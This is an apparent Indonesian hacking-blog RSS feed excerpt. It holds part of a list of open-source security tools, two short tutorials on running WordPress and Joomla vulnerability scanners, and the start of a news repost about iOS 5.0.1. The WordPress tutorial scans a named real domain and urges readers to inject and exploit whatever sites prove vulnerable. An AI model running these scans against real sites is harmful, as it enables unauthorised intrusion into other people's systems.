These two apps work together: The Sleuth Kit offers command line tools for conducting digital investigations, and Autopsy Browser offers a browser-based GUI for accessing those tools. The project also now includes a Hadoop framework for large-scale data analysis. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Gateway/Unified Threat Management Appliances&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
41. &lt;a href="http://www.endian.com/en/community/about/"&gt;Endian Firewall Community&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway&lt;br /&gt;
&lt;br /&gt;
Endian Firewall Community can turn any PC (including pretty old ones) into a gateway security appliance complete with a firewall, application-level proxies with antivirus support, virus and spam-filtering for email, Web content and a VPN. Supported versions of the software and hardware appliances are also available on the site. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
42. &lt;a href="http://www.untangle.com/store/lite-package.html"&gt;Untangle Lite&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway&lt;br /&gt;
&lt;br /&gt;
Similar to Endian, Untangle Lite also helps users create their own gateway security appliances. In addition, Untangle offers commercial products, and you can download each of the individual apps included in Untangle Lite (firewall, intrusion prevention, attack blocker, etc.) separately. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
43. &lt;a href="http://www.clearfoundation.com/"&gt;ClearOS&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway&lt;br /&gt;
&lt;br /&gt;
ClearOS combines gateway security functionality with the capabilities of a small business server. It offers networking, groupware, a mail server, a Web server and more. Paid support and hardware are also available. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Intrusion Detection&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
44. &lt;a href="http://sourceforge.net/projects/tripwire/"&gt;Open Source Tripwire&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Tripwire&lt;br /&gt;
&lt;br /&gt;
Standard Tripwire is now a closed source project, but the community has continued developing the open source version released in 2000. It monitors the content of files and alerts network managers when those files have changed, alerting them to possible intrusions. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
45. &lt;a href="http://www.ossec.net/"&gt;OSSEC&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Corero IPS, &amp;lt; ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/"&amp;gt;HP Tipping Point IPS, Sophos HIPS&lt;br /&gt;
&lt;br /&gt;
In addition to file integrity checking, OSSEC also performs log analysis, policy monitoring, rootkit detection and real-time alerting to help prevent and detect intrusions into your network. It's downloaded more than 5,000 times per month and has won numerous awards. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
46. &lt;a href="http://afick.sourceforge.net/"&gt;AFICK&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Tripwire&lt;br /&gt;
&lt;br /&gt;
AFICK, short for "Another File Integrity Checker," offers similar functionality as Tripwire. It's portable, fast and runs from a GUI or the command line. Operating System: Windows, Linux.&lt;br /&gt;
&lt;br /&gt;
47. &lt;a href="http://www.snort.org/"&gt;Snort&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Corero IPS, &amp;lt; ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/"&amp;gt;HP Tipping Point IPS, Sophos HIPS&lt;br /&gt;
&lt;br /&gt;
With millions of downloads and more than 400,000 registered users, Snort claims to be "the most widely deployed IDS/IPS technology worldwide." Operating System: Windows, Linux OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Network Firewalls&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
48. &lt;a href="http://www.ipcop.org/"&gt;IPCop&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
Like most of the other apps on our Firewall list, IPCop turns a PC into a Linux-based firewall to protect your network. This one is designed for home or SOHO users, and it boasts an easy-to-use Web interface. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
49. &lt;a href="http://www.devil-linux.org/home/index.php"&gt;Devil-Linux&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
Although it was originally designed to offer firewall and router functionality, Devil-Linux can also operate as a server for many applications, including mail hosting. Created by IT administrators for IT administrators, it boasts top-notch security and excellent customization capabilities. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
50. &lt;a href="http://www.turtlefirewall.com/"&gt;Turtle FireWall&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
Designed to be simple and fast, Turtle allows network managers to configure it via a Web interface or by modifying XML files. The website also includes some good introductory information on the nature of firewalls. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
51. &lt;a href="http://www.shorewall.net/"&gt;ShoreWall&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
Shorewall doesn't claim to be the easiest Linux firewall to use, but it does claim to be "the most flexible and powerful." You can use it on a system functioning as a dedicated firewall, as a multi-function gateway/router/server or as a standalone GNU/Linux PC. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Network Firewalls&lt;/b&gt; (continued from previous page)&lt;br /&gt;
&lt;br /&gt;
52. &lt;a href="http://www.vuurmuur.org/"&gt;Vuurmuur&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
Vuurmuur is designed to be both simple and powerful. In addition to standard firewall capabilities, it also supports traffic shaping and offers advanced monitoring capabilities. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
53. &lt;a href="http://m0n0.ch/wall/hardware.php"&gt;M0n0wall&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall&lt;br /&gt;
&lt;br /&gt;
Although it was designed for embedded PCs and appliance, m0n0wall can also run on a standalone PC running FreeBSD. It requires less than 12MB of space and boots in less than 25 seconds. Operating System: FreeBSD.&lt;br /&gt;
&lt;br /&gt;
54. &lt;a href="http://www.pfsense.org/"&gt;pfSense&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Barricuda NG Firewall, Check Point Appliances&lt;br /&gt;
&lt;br /&gt;
This m0n0wall fork is also based on BSD, but is designed for regular computers, not embedded hardware. It's been downloaded more than 1 million times and currently runs on more than 100,000 networks, including large corporations and universities as well as small home networks. Operating System: FreeBSD.&lt;br /&gt;
&lt;br /&gt;
55. &lt;a href="http://www.vyatta.com/downloads/index.php"&gt;Vyatta&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Cisco products&lt;br /&gt;
&lt;br /&gt;
The "core" Vyatta software allows users to make their own firewalls/networking appliances and routers. The company also offers paid software and hardware. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Network Monitoring&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
56. &lt;a href="http://www.wireshark.org/"&gt;Wireshark&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: OmniPeek, CommView&lt;br /&gt;
&lt;br /&gt;
Calling itself the "world's foremost network protocol analyzer," Wireshark makes it easy to capture and analyze network traffic. Commercial products and services related to the software are available through Riverbed Technology. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
57. &lt;a href="http://www.tcpdump.org/"&gt;TcpDump/Libpcap&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: OmniPeek, CommView,&lt;br /&gt;
&lt;br /&gt;
Tcpdump is a command line packet analyzer, and libpcap is a C/C++ library for network traffic capture. Working together, the two provide a good network monitoring solution, but, lacking a GUI, they are not particularly user-friendly. Operating System: Linux.&lt;br /&gt;
&lt;br /&gt;
58. &lt;a href="http://www.winpcap.org/windump/"&gt;WinDump&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces: OmniPeek, CommView&lt;br /&gt;
&lt;br /&gt;
Managed by Riverbed Technology (which also owns Wireshark), WinDump ports tcpdump to the Windows platform. This site also includes the WinPcap library and drivers for traffic capture. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Password Crackers&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
59. &lt;a href="http://ophcrack.sourceforge.net/"&gt;OphCrack&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Access Data Password Recovery Toolkit, Passware&lt;br /&gt;
&lt;br /&gt;
From time to time, everyone needs to recover a lost or unknown password. This password cracker uses the rainbow tables method to recover unknown passwords, and it also includes a brute force module for simple passwords. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
60. &lt;a href="http://accessdata.com/products/computer-forensics/decryption"&gt;Access Data Password Recovery&lt;/a&gt;, &lt;a href="http://www.lostpassword.com/"&gt;Passware&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
John the Ripper is particularly good at cracking weak passwords, but in order to use it, you'll need a list of commonly used passwords. You can buy password lists or a pro version of the software from the same site. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Password Management&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
61. &lt;a href="http://keepass.info/"&gt;KeePass Password Safe&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kaspersky Password Manager&lt;br /&gt;
&lt;br /&gt;
This popular password manager stores all of your passwords in an encrypted database. You'll only need to remember one master password, while this easy-to-use, lightweight app helps protect you from identity thieves. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
62. &lt;a href="http://www.keepassx.org/"&gt;KeePassX&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kaspersky Password Manager&lt;br /&gt;
&lt;br /&gt;
If you use OS X or Linux, try this fork of KeePass. Plus, it adds a few features not in the original and runs on Windows as well. Operating System: Windows, Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
63. &lt;a href="http://pwsafe.org/"&gt;Password Safe&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Kaspersky Password Manager&lt;br /&gt;
&lt;br /&gt;
Downloaded more than 1 million times, Password Safe is another popular open source option for protecting your passwords. Like KeePass, it's lightweight and stores your encrypted passwords in a database so that you only need to recall one master password. Operating System: Windows.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;User Authentication&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
64. &lt;a href="http://www.wikidsystems.com/"&gt;WIKID&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces Entrust IdentityGuard, Vasco Digipass, RSA's SecurID&lt;br /&gt;
&lt;br /&gt;
WiKID boasts "two-factor authentication without the hassle factor." In addition to the free community version, it also comes in a supported enterprise version which also adds additional functionality. Operating System: OS Independent.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Web Filtering&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
65. &lt;a href="http://dansguardian.org/"&gt;DansGuardian&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Replaces McAfee Family Protection&lt;br /&gt;
&lt;br /&gt;
NetNanny, CyberPatrol&lt;br /&gt;
&lt;br /&gt;
This award-winning content filter uses phrase matching, PICS filtering, URL filtering and other methods to block objectionable content. Note that this software does not run on individual PCs; it runs on an OS X or Linux server to protect the rest of your network. Operating System: Linux, OS X.&lt;br /&gt;
&lt;br /&gt;
=============================================================&lt;br /&gt;
&lt;br /&gt;
mungkin sekian dulu dari ane, semoga bermanfaat bagi kita semua &lt;br /&gt;
&lt;br /&gt;
wassalamu'alaikum wr wb &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hacker-newbie.org/showthread.php?tid=13009"&gt;Sumber&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Tutorial Wordpress Scanning</title><link>http://dzhenway.slackerc0de.us/2011/11/tutorial-wordpress-scanning.html</link><category>Apa Saja</category><category>Attack</category><category>Hacking</category><category>Info</category><category>Perl</category><category>Step by Step</category><category>wordpress</category><pubDate>Sun, 20 Nov 2011 11:52:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-3351769873975437657</guid><description>Assalamu'alaikum dan salam sejahtera buat kita semua &lt;br /&gt;
ketemu agy ma ane yg newbie nie &lt;img alt="bangga" border="0" src="http://devilzc0de.org/forum/images/smilies/bangga.gif" style="vertical-align: middle;" title="bangga" /&gt;&lt;br /&gt;
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan &lt;br /&gt;
&lt;br /&gt;
tanpa banyak bacot langsung ke topic utamanya ea&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;br /&gt;
CEKIDOT !!!&lt;br /&gt;
&lt;br /&gt;
1. Download software wordpress scanner disini &lt;a href="http://www.sokomm.fr//wp-content/uploads/WP-SCAN.zip"&gt;wp-scan&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
==============================================================&lt;br /&gt;
&lt;br /&gt;
-=- kita akan menjalankan wordpress scanner&lt;br /&gt;
&lt;br /&gt;
setelah di download,, extract dulu file tersebut &lt;br /&gt;
&lt;br /&gt;
buka terminal dan ketikkan command berikut ini :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codeblock"&gt;&lt;div class="title"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;cd Downloads&lt;br /&gt;
cd WP-SCAN&lt;br /&gt;
perl wp-scan.pl target.com&lt;br /&gt;
ex : perl wp-scan.pl www.webhostingiix.com&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="spoiler_wrap"&gt;&lt;div class="spoiler_header"&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;img alt="[Image: Screenshot-7.png]" border="0" height="224" src="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-7.png" width="400" /&gt;&lt;/div&gt;&lt;div class="spoiler_copy"&gt;&lt;a href="http://devilzc0de.org/forum/thread-10992.html"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="spoiler_wrap"&gt;&lt;div class="spoiler_header"&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;img alt="[Image: Screenshot-1-1.png]" border="0" height="224" src="http://i842.photobucket.com/albums/zz349/dzhenway/Screenshot-1-1.png" width="400" /&gt;&lt;/div&gt;&lt;div class="spoiler_copy"&gt;&lt;a href="http://devilzc0de.org/forum/thread-10992.html"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)&lt;br /&gt;
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi&lt;br /&gt;
&lt;br /&gt;
selanjutnya kalian bisa melakukan penginjectkan terhadap target  &lt;br /&gt;
===========================================================================&lt;br /&gt;
&lt;br /&gt;
silahkan tunggu sampai selesai dari proses scanning&lt;br /&gt;
&lt;br /&gt;
nantinya disana akan tertera mana saja yang vuln&lt;br /&gt;
&lt;br /&gt;
setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara &lt;img alt="ngakak" border="0" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" style="vertical-align: middle;" title="ngakak" /&gt;&lt;br /&gt;
&lt;br /&gt;
untuk nyari exploitnya bisa cari dimana saja &lt;img alt="ngakak" border="0" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" style="vertical-align: middle;" title="ngakak" /&gt;&lt;br /&gt;
&lt;br /&gt;
sekian dulu tutor cupu dari ane &lt;img alt="mewek" border="0" src="http://devilzc0de.org/forum/images/smilies/mewek.gif" style="vertical-align: middle;" title="mewek" /&gt;&lt;br /&gt;
&lt;br /&gt;
semoga bermanfaat buat kita semua &lt;img alt="belajar" border="0" src="http://devilzc0de.org/forum/images/smilies/belajar.gif" style="vertical-align: middle;" title="belajar" /&gt;&lt;br /&gt;
&lt;br /&gt;
akhir kata dari ane, wassalam &lt;img alt="bangga" border="0" src="http://devilzc0de.org/forum/images/smilies/bangga.gif" style="vertical-align: middle;" title="bangga" /&gt;&lt;br /&gt;
&lt;br /&gt;
nb : vba &amp;amp; ArRay&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">7</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Tutorial Joomla Web Scanner 1.7</title><link>http://dzhenway.slackerc0de.us/2011/11/tutorial-joomla-web-scanner-17.html</link><category>Apa Saja</category><category>Attack</category><category>Hacking</category><category>Info</category><category>Joomla</category><category>Perl</category><category>Software</category><category>Step by Step</category><category>vulnerability</category><pubDate>Sun, 20 Nov 2011 11:38:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-8772995938245959170</guid><description>Assalamu'alaikum dan salam sejahtera buat kita semua &lt;img alt="seneng" border="0" src="http://devilzc0de.org/forum/images/smilies/penjahat.gif" style="vertical-align: middle;" title="seneng" /&gt;&lt;br /&gt;
&lt;br /&gt;
sudah lama tidak update blog&lt;br /&gt;
&lt;br /&gt;
oke langsung saja,,kali ini ane akan memberikan sedikit maenan buat tmen2 semua&lt;br /&gt;
&lt;br /&gt;
sesuai dengan judulnya "Joomla Web Scanner 1.7"&lt;br /&gt;
&lt;br /&gt;
dengan melihat judulnya saja,pasti temen-temen sudah pada ngerti tools ini buat apa&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;br /&gt;
CEKIDOT !!!&lt;br /&gt;
&lt;br /&gt;
1. download dulu toolsnya &lt;a href="http://packetstormsecurity.org/files/download/106444/joomlascan-1.7.tar.gz"&gt;Joomla-Scan&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
2. setelah di download mari kita extract file tersebut&lt;br /&gt;
&lt;br /&gt;
3. kemudian kita akan menjalankan proses scanning target&lt;br /&gt;
&lt;br /&gt;
pertama-tama kita lihat dulu command untuk tool ini&lt;br /&gt;
&lt;br /&gt;
ketikkan = ./joomlascan/pl help&lt;br /&gt;
&lt;br /&gt;
nantinya akan keluar seperti ini&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codeblock"&gt;&lt;div class="spoiler_header"&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;img alt="[Image: joomla1.png]" border="0" height="224" src="http://i842.photobucket.com/albums/zz349/dzhenway/joomla1.png" width="400" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="body" dir="ltr"&gt;&lt;code&gt;Usage:&amp;nbsp;&amp;nbsp;./joomlascan.pl -u &amp;lt;joomla_url&amp;gt; [options]&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;== Options ==&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-p &amp;lt;string:int&amp;gt;&amp;nbsp;&amp;nbsp;= proxy:port&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-a&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Admin folder (default '/administration')&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-v&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Check version&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-c&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Check components&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-f&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Check firewall&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-co&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Check bugs in core (require -v)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-cm&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Check bugs in components (require -c)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-all&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Check all (default)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-ot&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Output to text file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-oh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Output to html file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-update&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Search for updates&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-force-update&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= Force to download updates&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-about&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = About joomlascan&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-version&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; = Print version info&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-h, -help&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;= This help&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;== Examples ==&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;To scan running joomla version and components:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $./joomlascan.pl -u www.host.com -v -c&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;To scan version and core bugs:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $./joomlascan.pl -u www.host.com -v -co&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
4. saatnya beraksi dengan mengetik command berikut ini&lt;br /&gt;
&lt;br /&gt;
&lt;div class="codeblock"&gt;&lt;div class="title"&gt;&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;./joomlascan.pl -u www.target.com -v -co&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
tunggu sampai selesai proses scanning,,ngerokok dulu mas bro &lt;img alt="ngakak" border="0" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" style="vertical-align: middle;" title="ngakak" /&gt;&lt;br /&gt;
&lt;br /&gt;
setelah selesai akan seperti ini hasilnya&lt;br /&gt;
&lt;br /&gt;
&lt;div class="spoiler_wrap"&gt;&lt;div class="spoiler_header"&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt;&lt;img alt="[Image: joomla-vuln.png]" border="0" height="224" src="http://i842.photobucket.com/albums/zz349/dzhenway/joomla-vuln.png" width="400" /&gt;&lt;/div&gt;&lt;div class="spoiler_copy"&gt;&lt;a href="http://devilzc0de.org/forum/thread-10990.html"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;mungkin segitu dulu tutor cupu dari ane&lt;br /&gt;
&lt;br /&gt;
semoga bermanfaat bagi kita semua&lt;br /&gt;
&lt;br /&gt;
akhir kata dari ane,,wassalam &lt;img alt="bangga" border="0" src="http://devilzc0de.org/forum/images/smilies/bangga.gif" style="vertical-align: middle;" title="bangga" /&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Apple's iOS 5.0.1 is out - should you upgrade?</title><link>http://dzhenway.slackerc0de.us/2011/11/apples-ios-501-is-out-should-you.html</link><category>Apa Saja</category><category>Apple iOS</category><category>Info</category><category>ipad</category><category>iphone</category><category>iTunes</category><category>Ponsel</category><category>smartphones</category><category>vulnerability</category><pubDate>Sat, 12 Nov 2011 12:55:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-4693960030606517973</guid><description>&lt;div class="entry-content"&gt;&lt;img align="right" alt="" height="150" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/ios-5-0-1-150.png?w=150&amp;amp;h=150" title="iOS 5.0.1 pseudologo" vspace="10" width="150" /&gt;Apple's latest iOS update is out.&lt;br /&gt;
&lt;br /&gt;
The new version bumps iOS5 up to 5.0.1, and is Apple's first OTA update.&lt;br /&gt;
&lt;br /&gt;
OTA stands for "over-the-air", and means that you can download and apply the update directly from your iDevice. &lt;br /&gt;
You no longer need to download the entire firmware file to your computer - including yet another copy of everything which &lt;i&gt;hasn't&lt;/i&gt; changed in iOS - and push it to your device. &lt;span class="fullpost"&gt;&lt;br /&gt;
(OTA updating isn't yet mandatory. If you prefer to keep full copies  of each iOS firmware distro, you can still use the  download-and-install-with-iTunes method.)&lt;br /&gt;
&lt;br /&gt;
According to Apple, the &lt;a href="http://support.apple.com/kb/DL1472" rel="nofollow"&gt;highlights&lt;/a&gt; of the 5.0.1 update are that it:&lt;br /&gt;
&lt;b&gt;* fixes bugs&lt;/b&gt; affecting battery life,&lt;br /&gt;
&lt;b&gt;* adds Multitasking Gestures&lt;/b&gt; for the original iPad,&lt;br /&gt;
&lt;b&gt;* resolves bugs&lt;/b&gt; with Documents in the Cloud, and&lt;br /&gt;
&lt;b&gt;* improves voice recognition&lt;/b&gt; for Australian users using dictation.&lt;br /&gt;
&lt;br /&gt;
Strewth! That last one's a bonzer boost for blokes and sheilas  everywhere! Gives an Aussie something worth lifting a tinnie to after  the Baggy Green got such a &lt;a href="http://www.smh.com.au/sport/cricket/missed-chances-foil-saggy-green-hopes-20111111-1nc38.html" rel="nofollow"&gt;big hiding&lt;/a&gt; from the South Africans in the cricket!&lt;br /&gt;
&lt;br /&gt;
